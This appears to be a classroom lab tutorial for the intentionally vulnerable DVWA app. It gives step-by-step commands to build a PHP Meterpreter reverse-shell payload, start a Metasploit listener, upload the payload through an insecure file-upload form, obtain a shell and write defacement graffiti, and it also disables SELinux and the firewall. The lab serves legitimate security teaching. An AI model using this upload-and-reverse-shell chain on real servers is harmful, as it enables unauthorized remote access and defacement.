Hướng Dẫn Thực Hành -Upload PHP Backdoor Payload (DVWA): Lesson 8

---

Section 0. Background Information

• What is Damn Vulnerable Web App (DVWA)?
  • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
  • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
• Pre-Requisite Labs
  • Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14

• Lab Notes
  • In this lab we will do the following:
    1. We will create a php/meterpreter/reverse_tcp payload
    2. We will start the php/meterpreter/reverse_tcp listener
    3. We will upload the PHP payload to the DVWA Upload screen
    4. We will use the PHP payload to establish a connection to the DVWA (Fedora14) machine.

• Legal Disclaimer
    Bài hướng dẫn dùng cho lớp học

Section 1. Configure Fedora14 Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit BackTrack Virtual Machine Settings
   • Instructions:
     1. Highlight fedora14
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
• Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Click on the OK Button.
• 

Section 2. Login to Fedora14

1. Start Fedora14 VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select Fedora14
     3. Play virtual machine
   • 
2. Login to Fedora14
   • Instructions:
     1. Login: student
     2. Password: <whatever you set it to>.
   • 

Section 3. Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console
   • Instructions:
     1. Applications --> Terminal
   • 
2. Switch user to root
   • Instructions:
     1. su - root
     2. <Whatever you set the root password to>
   • 
3. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes:
     • As indicated below, my IP address is 192.168.1.106.
     • Please record your IP address.
   • 

Section 4. Temporarily Disable SELINUX and Firewall

1. Start a Terminal Console
   • Instructions:
     1. sestatus
     2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
     3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
   • Notes:
     • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
   • 
2. Place selinux in permissive mode
   • Instructions:
     1. echo 0 > /selinux/enforce
        • Placing a "0" in the enforce file, puts selinux in permissive mode.
     2. sestatus
        • Notice that "Current mode:" changed to permissive.
   • 
3. Disable Firewall
   • Instructions:
     1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
     2. service iptables stop
        • This command disables the firewall.
   • 

Section 5. Fix Upload Ownership and Permissions

1. Fix Ownership and Permissions
   • Instructions:
     1. Bring up a Terminal Console on the DVWA (Fedora14) machine.
     2. chown root:apache /var/www/html/dvwa/hackable/uploads/
     3. chmod 775 /var/www/html/dvwa/hackable/uploads/
     4. ls -ld /var/www/html/dvwa/hackable/uploads/
   • Known Issue:
     1. By default, the /var/www/html/dvwa/hackable/uploads/ directory is user and group owned by root.
     2. In addition, the apache user did not have "write" permission to allow a user to place a file in the hackable/uploads directory.
   • 

Section 6. Configure BackTrack Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit BackTrack Virtual Machine Settings
   • Instructions:
     1. Highlight BackTrack5R1
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
   • Instructions:
     1. Highlight Network Adapter
     2. Select Bridged
     3. Do not Click on the OK Button.
   • 

Section 7. Login to BackTrack

1. Start BackTrack VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select BackTrack5R1
     3. Play virtual machine
   • 
2. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
3. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 

Section 8. Open Console Terminal and Retrieve IP Address

1. Open a console terminal
   • Instructions:
     1. Click on the console terminal
   • 
2. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes:
     • As indicated below, my IP address is 192.168.1.105.
     • Please record your IP address.
   • 

Section 9. Build PHP msfpayload

1. Open a console terminal
   • Instructions:
     1. Click on the console terminal
   • 
2. Create msfpayload
   • Instructions:
     1. mkdir -p /root/backdoor
     2. cd /root/backdoor
     3. msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > PHONE_HOME.php
        1. Obtain the BackTrack IP Address from (Section 8, Step 2).
     4. ls -l PHONE_HOME.php
   • 
3. Edit PHONE_HOME.php
   • Instructions:
     1. vi PHONE_HOME.php
   • 
4. Remove the "#" character
   • Instructions:
     1. Press "x" to delete the "#" character on the first line.
     2. Press <Esc>
     3. Type ":wq!"
   • 

Section 10. Start PHP Payload Listener

1. Open a console terminal
   • Instructions:
     1. Click on the console terminal
   • 
2. Start msfconsole
   • Instructions:
     1. msfconsole
   • 
3. Start PHP Listener
   • Instructions:
     1. use exploit/multi/handler
     2. set PAYLOAD php/meterpreter/reverse_tcp
     3. set LHOST 192.168.1.105
        • Obtain the BackTrack IP Address from (Section 8, Step 2).
     4. set LPORT 4444
     5. exploit
     6. Continue to Next Section
   • 

Section 11. Login to DVWA

1. Start Firefox
   • Instructions:
     1. Click on Firefox
   • 
2. Login to DVWA
   • Instructions:
     1. Start up Firefox on BackTrack
     2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
     3. Login: admin
     4. Password: password
     5. Click on Login
   • 

Section 12. Set Security Level

1. Set DVWA Security Level
   • Instructions:
     1. Click on DVWA Security, in the left hand menu.
     2. Select "low"
     3. Click Submit
   • 

Section 13. Upload PHP Payload

1. Upload Menu
   • Instructions:
     1. Select "Upload" from the left navigation menu.
     2. Click Browse
   • 
2. Navigate to PHONE_HOME.php
   • Instructions:
     1. Click on File System
     2. Click on root
     3. Click on backdoor
     4. Select Open
   • 
3. Upload PHONE_HOME.php
   • Instructions:
     1. Click the Upload button
   • 
4. Activate PHONE_HOME.php
   • Instructions:
     1. http://192.168.1.106/dvwa/hackable/uploads/
        • This is the IP address of the DVWA (Fedora14) machine obtained in (Section 3, Step 3).
     2. Click on PHONE_HOME.php
     3. Continue to next step
   • 
5. Connection Established
   • Notes:
     1. Notice the stage was sent to the DVWA machine (Fedora14) along with the handy dandy meterpreter.
     2. Continue to next step.
   • 
6. Establishing a Shell
   • Instructions:
     1. shell
        • Establishes a "sh" shell.
     2. uptime
        • How long has the server been up
     3. pwd
        • Current working directory
     4. whoami
        • Show who am I logged in as.
     5. w
        • Notice there is no entry for the user apache
     6. echo "Hacked at 4-23-2012, by Your Name" > hacked.html
        • Create some simple web graffiti
        • Replace 4-23-2012 with the present date.
        • Replace the string "Your Name" with your actual name.
     7. ls -l
   • 

Section 14. Proof of Lab

1. Proof of Lab
   • Proof of Lab Instructions:
     1. On BackTrack, place the below URI in Firefox
        • http://192.168.1.106/dvwa/hackable/uploads/hacked.html
          • Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
     2. Do a <PrtScn>
     3. Paste into a word document
     4. Email to Csirt247@Gmail.Com
   •